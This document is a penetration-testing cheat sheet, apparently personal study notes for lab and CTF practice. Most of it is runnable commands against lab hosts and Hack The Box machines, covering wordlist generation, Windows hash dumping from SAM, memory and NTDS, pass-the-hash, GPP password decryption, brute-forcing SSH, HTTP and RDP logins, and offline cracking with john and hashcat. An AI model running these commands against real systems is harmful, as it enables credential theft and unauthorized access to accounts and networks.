1 Preparing for brute force
Identify hash
hash-identifier
crunch
| crear passwords de 6 digitos con valores hasta f (112MB)
root@kali: crunch 6 6 0123456789ABCDEF -o list.txt
| crear algo mas comun CON CHARACTER SETS (34 MB)
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o mixedalpha.txt
cewl
| podemos usar palabras y frases de la pagina web de la empresa para generar una lista.
root@kali: cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
| create custom dic
- usamos john para modificar las palabras que bajamos.
root@kali: vim /etc/john/john.conf root@kali: john --wordlist=megacorp-cewl.txt --rules --stdout>mutated.txt
2 WINDOWS DUMP
SAM
The Security Account Manager (SAM) is a database file[1] in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores users’ passwords.
location:
/windows/system32/config/SAM
The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash
LM NTLM NET-NTLMv2 hashes
NTLM:
NTLM hashes are stored in the Security Account Manager (SAM) database and in the Domain Controller’s NTDS.dit database.
- from 1
aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 lmhas : ntlmhash - form 2
Administrator:500:aad3b435b51404eeaad3b435b51404ee:214e90b41e2752d80acd34e13f3e9831::: username :userid: lmhash : ntlmhash :::The LM hash is the one before the semicolon (:) and the NT hash is the one after the semicolon. Starting with Windows Vista and Windows Server 2008, by default, only the NT hash is stored.
** Net-NTLMv1/v2**
Net-NTLM hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user’s NT hash). Here is an example of a Net-NTLMv2 (a.k.a NTLMv2) hash:
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
volatility
Retrieve a user’s password from a memory dump you need to know the OS
| 1. check profile type of the memory dump (ex: Win7SP1x86):
volatility imageinfo -f memorydumpfilename.raw
| 2. get the hive list so we can get the starting location in memory of where the registry information resides:
volatility hivelist -f memdumpfilename.raw --profile=Win7SP1x86
0x9aad6148 0x131af148 \SystemRoot\System32\Config\SAM
0x8b21c008 0x039ef008 \REGISTRY\MACHINE\SYSTEM
0x9aad6148, 0x8b21c008
| 3. dump the hashes
volatility -f memorydumpfilename.dmp --profile=Win7SP1x86 hashdump -y 0x8b21c008 -s 0x9aad6148 > hashes.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
| 4. pass the hash
with pth-winexe:
root@kali: pth-winexe -U administrator%hash //192.168.31.233 cmd
with psexec.py:
psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 cmd.exe
pwdump and fgdump
- PWdump.exe can be used to crack local SAM hashes in memory. Does not have the added bonus like FGdump of disabling antivirus. This will need to be done prior to running the program
pwdump.exe (host) - fgdump.exe can be used to crack local SAM hashes in memory. The program uses the IPC$ share to connect and additionally attempts to disable antivirus that may be running on the host
fgdump.exe, then "type 127.0.0.1.pwdump"pwdump sam drump hashes
root@kali:/mnt/vhd/Windows/System32/config: pwdump SYSTEM SAM Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
WCE windows credential editor
wce32.exe (wce64.exe) can be used to attempt cracking of user passwords in memory, windows xp, vista, 2003, 7 y 2008 wce can be use to pass the hash. You need local administrator privileges to run WCE and be able to steal NTLM credentials from memory. This is a post-exploitation tool.
c:\user> wce64.exe -w
c:\user> wce32.exe -w
passing the hash
nltm hash se puede usar en lugar deun clear text
root@kali: vim hashes.txt
remplazamos el no password por otra cosa y despues exportamos ese hash
root@kali: export SMBHASH=saras...asdas
root@kali: pth-winexe -U administrator%hash //192.168.31.233 cmd
psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 cmd.exe
ex:
pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd
You CAN perform Pass-The-Hash attacks with NTLM hashes. You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes. You CAN attack net-ntlmv2 with responder with LLMNR Poisonin
3 Active Directory
Misconfigured AD
net use z: \\(target_hostname)\SYSVOL
dir /s Groups.xml
type Z:\local.domain\Policies\{84583021-C460-486C-83E1- FA1EC8CA84FC}\Machine\Preferences\Groups\Groups.xml
gpp-decrypt SvtusBQWJgAFrFPTyPH9clizXPQBDqDDGzlSDxKogcz, password will be outputted
AD password audit
The psexec_ntdsgrab module will be used to create Volume Shadow Copies of the ntds.dit and SYSTEM hive and grab them from the domain controller. It requires domain administrator credentials.
crea 2 archivos uno .dit y otro .bin
extract hashes
./impacket/examples/secretsdump.py -ntds /home/lab/.msf4/loot/[blah]_psexec.ntdsgrab._104930.dit -system /home/lab/.msf4/loot/[blah]_psexec.ntdsgrab._438132.bin -hashes lmhash:nthash LOCAL -outputfile ntlm_hashes
4 Online passwords attack
para tratar de conectarse a http ssh ftp, etc, hay que mandar varios request al server\
tools:medusa hydra ncrack
medusa
root@kali: medusa -h 192.168.31.219 -u admin -P password-file.txt -M http -m DIR:/admin -T 20
crowbar (rdesktop)
for example for rdesktop
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1
hydra
- ej:
hydra –l (found_name) –P password.lst 192.168.168.168 ssh hydra -L username_list.txt -P password_list.txt 192.168.168.168 ssh -t 4 -l user -L list of user -p password -P list of passwords - HTTP post form
hydra -L <wordlist> -P<password list> <IP> http-post-form "<file path>:username=^USER^&password=^PASS^&Login=Login:<fail message>"
ncrack
sirve mucho para romper rdp
root@kali: ncrack -v -f --user administrator -P password-file.txt rdp://192.168.31.233,CL=1
5 Offline passwords attack
John the ripper
root@kali:~# john hashes.txt
root@kali:~# john --format=nt windowshashes.txt --wordlist=passwords.txt
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 password_list
ssh keys bruteforce
2496 python /usr/share/john/ssh2john.py matt_rsa > matt.hash
2500 john --wordlist=rockyou.txt ~/.ssh/matt.hash
unshadow
- ex:
unshadow password_file shadow_file > new_password_list
oclhashcat ntlm sam hash from pwdump
- suponiendo:
cat hash-nolimpio.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:214e90b41e2752d80acd34e13f3e9831:::
username : userid : lmhash : ntlmhash
cat hashes.txt
> 214e90b41e2752d80acd34e13f3e9831
- corremos:
root@kali:~# hashcat -m 1000 -a 0 --force hashes-bastion/hashes.txt rockyou.txt
md5 hashcat
I put this $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ into a .txt file and the following command: hashcat -m 500 -a 0 --force davidHash '/root/Desktop/rockyou.txt'
online hash crackers
- Hashkiller (Windows/NTLM): https://hashkiller.co.uk/ntlm-decrypter.aspx
- Crackstation (MD5): https://crackstation.net
- Offensive security (MD5): http://cracker.offensive-security.com
cracking ntlm hashes SAM dump
| lm
299BD128C1101FD6
john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt
| NTHash
B4B9B02E6F09A9BD760F388B67351E2B
john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt
| NTLMv1 (A.K.A. Net-NTLMv1)
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt
| NTLMv2 (A.K.A. Net-NTLMv2)
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt
6 ZIP
fcrackzip
fcrackzip -v -u -D -p "rockyou.txt" /root/hackthebox/node/myplace-backup.zip